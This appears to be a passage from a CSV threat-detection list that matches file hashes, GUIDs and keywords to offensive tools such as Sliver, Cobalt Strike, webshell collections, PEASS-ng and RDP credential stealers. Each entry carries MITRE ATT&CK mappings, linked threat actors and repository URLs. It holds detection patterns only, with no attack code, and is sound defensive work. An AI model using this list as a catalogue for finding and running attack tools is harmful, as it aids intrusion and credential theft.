"*bb635b88ae16476a37144d24c8b0f898d619147d069091e9869de6db130db0df*",".{0,1000}bb635b88ae16476a37144d24c8b0f898d619147d069091e9869de6db130db0df.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","35352"
"*bb65c7f01b9110e615083a0c5a02d324dd0dcd9416bd9791b4fc92d284cbf206*",".{0,1000}bb65c7f01b9110e615083a0c5a02d324dd0dcd9416bd9791b4fc92d284cbf206.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35354"
"*bb695f5c847a67e8d0b6918a474b0f93090c8c5d64bf5b160b9f0c0fd4352bf5*",".{0,1000}bb695f5c847a67e8d0b6918a474b0f93090c8c5d64bf5b160b9f0c0fd4352bf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35355"
"*bb6ca78dc8a3774eb3db52580c52bc6b47ca885d9881f5cb422c915ca2c2a7a9*",".{0,1000}bb6ca78dc8a3774eb3db52580c52bc6b47ca885d9881f5cb422c915ca2c2a7a9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35356"
"*bb6ff6e0660ed1de042e61d57e12a8cc93709dc19db5328b53d5f258839cd7c0*",".{0,1000}bb6ff6e0660ed1de042e61d57e12a8cc93709dc19db5328b53d5f258839cd7c0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35357"
"*bb774a70665afeafeda776cc7b37f59f29fc3b16124e94020a91d4fdfa3f260b*",".{0,1000}bb774a70665afeafeda776cc7b37f59f29fc3b16124e94020a91d4fdfa3f260b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35359"
"*bb7f042ac2b1d062178a3168cda13c75564282b4d9c5aa231ff2dd42fb343fd1*",".{0,1000}bb7f042ac2b1d062178a3168cda13c75564282b4d9c5aa231ff2dd42fb343fd1.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","35361"
"*bb816067581c9cd64ea54ff05611c02efa4303ef95c86e027ca26aa2ae80c185*",".{0,1000}bb816067581c9cd64ea54ff05611c02efa4303ef95c86e027ca26aa2ae80c185.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","35363"
"*bb8861d4a96d5b61c018115dcfe61176d12097e271ac1d34860bf50fe89618c8*",".{0,1000}bb8861d4a96d5b61c018115dcfe61176d12097e271ac1d34860bf50fe89618c8.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","35365"
"*bb89de818ececdcc29e0dae02fc30b07b8646c45a2fd46fa0bb55659b946aa93*",".{0,1000}bb89de818ececdcc29e0dae02fc30b07b8646c45a2fd46fa0bb55659b946aa93.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","35366"
"*BB8A69C4-18B0-4FF2-989C-F70778FFBCE6*",".{0,1000}BB8A69C4\-18B0\-4FF2\-989C\-F70778FFBCE6.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#GUIDproject","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","35367"
"*bb8a907ebbe611f271b35d461b15ccb8e90e36567e9963ea9a64ba4fe3d7d1bc*",".{0,1000}bb8a907ebbe611f271b35d461b15ccb8e90e36567e9963ea9a64ba4fe3d7d1bc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","35368"
"*bb8ca66193a7f85a5e87467806865b8dc7656db2eb5e3fd86576d4559bf9c737*",".{0,1000}bb8ca66193a7f85a5e87467806865b8dc7656db2eb5e3fd86576d4559bf9c737.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35370"
"*bb8e4578feb7e957ef5b77433c1ee7cb339499d1bd05460848bc841871e0b672*",".{0,1000}bb8e4578feb7e957ef5b77433c1ee7cb339499d1bd05460848bc841871e0b672.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","35371"
"*bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31*",".{0,1000}bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","35373"
"*bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31*",".{0,1000}bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#filehash","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","35374"
"*bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31*",".{0,1000}bb91387aea9bb46572a1b0a0be195f8ca26f47c7e5dc42c04b5b8a614a686c31.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#filehash","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","35375"
"*bb94573eaa965f3371451dcfbde19645354cfd7a8d18f2022d2497d182e72754*",".{0,1000}bb94573eaa965f3371451dcfbde19645354cfd7a8d18f2022d2497d182e72754.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#filehash","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","35376"
"*bb949fe0fcc794116d8972a418314c97d0e39c536a56d1858866ff8eb6a46f02*",".{0,1000}bb949fe0fcc794116d8972a418314c97d0e39c536a56d1858866ff8eb6a46f02.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35377"
"*bb94dc4cb2b8a99594a2199912c675406ae64d5e30141c4f3aa9109053a2790d*",".{0,1000}bb94dc4cb2b8a99594a2199912c675406ae64d5e30141c4f3aa9109053a2790d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35378"
"*bb95177747c3f54ff72dbcd2942c2278ee7567a1202c6d5c3183faeb78cf673c*",".{0,1000}bb95177747c3f54ff72dbcd2942c2278ee7567a1202c6d5c3183faeb78cf673c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35379"
"*bb9699111559e3ac8e2739160742798aa113f5ad994e6bff78b1dc6d999c4116*",".{0,1000}bb9699111559e3ac8e2739160742798aa113f5ad994e6bff78b1dc6d999c4116.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35380"
"*bb9baa4f564a8d9630350d7b057686668f2096d5b59062d247a64266d379f185*",".{0,1000}bb9baa4f564a8d9630350d7b057686668f2096d5b59062d247a64266d379f185.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35381"
"*bba2c964972ac62ae9f9a2e0ee0046fa046dff0cd53183ca2169e1659c234e98*",".{0,1000}bba2c964972ac62ae9f9a2e0ee0046fa046dff0cd53183ca2169e1659c234e98.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","35382"
"*bba575ec-0c7f-42e1-9b59-b7c9cca522ba*",".{0,1000}bba575ec\-0c7f\-42e1\-9b59\-b7c9cca522ba.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","#GUIDproject","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","35384"
"*bba6a9e8cad0cb6d31618c1cc565475cc23487f624a202002bba3170905ce614*",".{0,1000}bba6a9e8cad0cb6d31618c1cc565475cc23487f624a202002bba3170905ce614.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","35386"
"*bbae26473d5ca41404788c5b58ab495e9b7fdd988986657be0e0505400047207*",".{0,1000}bbae26473d5ca41404788c5b58ab495e9b7fdd988986657be0e0505400047207.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35388"
"*bbafc8c3db7a42d1419f9c741f6508da43325f3993202d8955b2f9e0d2f971a9*",".{0,1000}bbafc8c3db7a42d1419f9c741f6508da43325f3993202d8955b2f9e0d2f971a9.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","35389"
"*bbb23c2b1443945e653b67353906939549ffac7dcdcf4bfd6a6c2f67a6320d13*",".{0,1000}bbb23c2b1443945e653b67353906939549ffac7dcdcf4bfd6a6c2f67a6320d13.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35391"
"*bbbf3709995e0cb8924bc07e857042afdf5a294620c32e12136805ed6bb8735b*",".{0,1000}bbbf3709995e0cb8924bc07e857042afdf5a294620c32e12136805ed6bb8735b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35393"
"*BBCD0202-C086-437C-A606-015456F90C46*",".{0,1000}BBCD0202\-C086\-437C\-A606\-015456F90C46.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","#GUIDproject","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","35395"
"*bbd92565c5ec78f1d2935a02745d85bc09e5b4624413cbc8fbb704c611b98050*",".{0,1000}bbd92565c5ec78f1d2935a02745d85bc09e5b4624413cbc8fbb704c611b98050.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35396"
"*bbdd3620a67aedec4b9a68b2c9cc880b6631215e129816aea19902a6f4bc6f41*",".{0,1000}bbdd3620a67aedec4b9a68b2c9cc880b6631215e129816aea19902a6f4bc6f41.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","35397"
"*bbdfa6cc54416cfa7ee7af469569e527d2f8d009c2e8aab2393c531749dc7e2d*",".{0,1000}bbdfa6cc54416cfa7ee7af469569e527d2f8d009c2e8aab2393c531749dc7e2d.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","35398"
"*bbe1978fae7026d7eb9aafab269fec0780e41ecccf40ad03dc37cc12653c2c14*",".{0,1000}bbe1978fae7026d7eb9aafab269fec0780e41ecccf40ad03dc37cc12653c2c14.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35399"
"*bbe45481716b6bb2d560efd66772ed9e43c148498c7c5003d4889fafed723cca*",".{0,1000}bbe45481716b6bb2d560efd66772ed9e43c148498c7c5003d4889fafed723cca.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","35401"
"*bbe4f27231eb9b0b5f7f223d84fa323de69b1575f4b391d7de0614325a97c24d*",".{0,1000}bbe4f27231eb9b0b5f7f223d84fa323de69b1575f4b391d7de0614325a97c24d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35402"
"*bbee76061abd7a8272670354eaa071c698657c4f96f9d6002d36ee8cd234f791*",".{0,1000}bbee76061abd7a8272670354eaa071c698657c4f96f9d6002d36ee8cd234f791.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","35404"
"*bbepis/Nsocks*",".{0,1000}bbepis\/Nsocks.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","1","N/A","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","35405"
"*bbf29036cd4d73fa71e311d60c436a4c03b72d2ea9b9c450ca9a88bb6ce98a03*",".{0,1000}bbf29036cd4d73fa71e311d60c436a4c03b72d2ea9b9c450ca9a88bb6ce98a03.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35406"
"*bbf4a68d05e79d8d2ce0bbd948a713ddafcb74b4ababa5f43c154592bc09e897*",".{0,1000}bbf4a68d05e79d8d2ce0bbd948a713ddafcb74b4ababa5f43c154592bc09e897.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","35407"
"*BBFBAF1D-A01E-4615-A208-786147320C20*",".{0,1000}BBFBAF1D\-A01E\-4615\-A208\-786147320C20.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#GUIDproject","N/A","10","10","N/A","N/A","N/A","N/A","35408"
"*bbfc6050331bf5adc5739601417028779f7d971915cf97d7052b9d2f55e06302*",".{0,1000}bbfc6050331bf5adc5739601417028779f7d971915cf97d7052b9d2f55e06302.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35409"
"*bbfe2aee2092d981bd2822b8fde8db0ed264f0f86ed445d8987d99b505fd0ff5*",".{0,1000}bbfe2aee2092d981bd2822b8fde8db0ed264f0f86ed445d8987d99b505fd0ff5.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","#filehash","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","35410"
"*bblockdlls*",".{0,1000}bblockdlls.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35412"
"*bbrowserpivot*",".{0,1000}bbrowserpivot.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 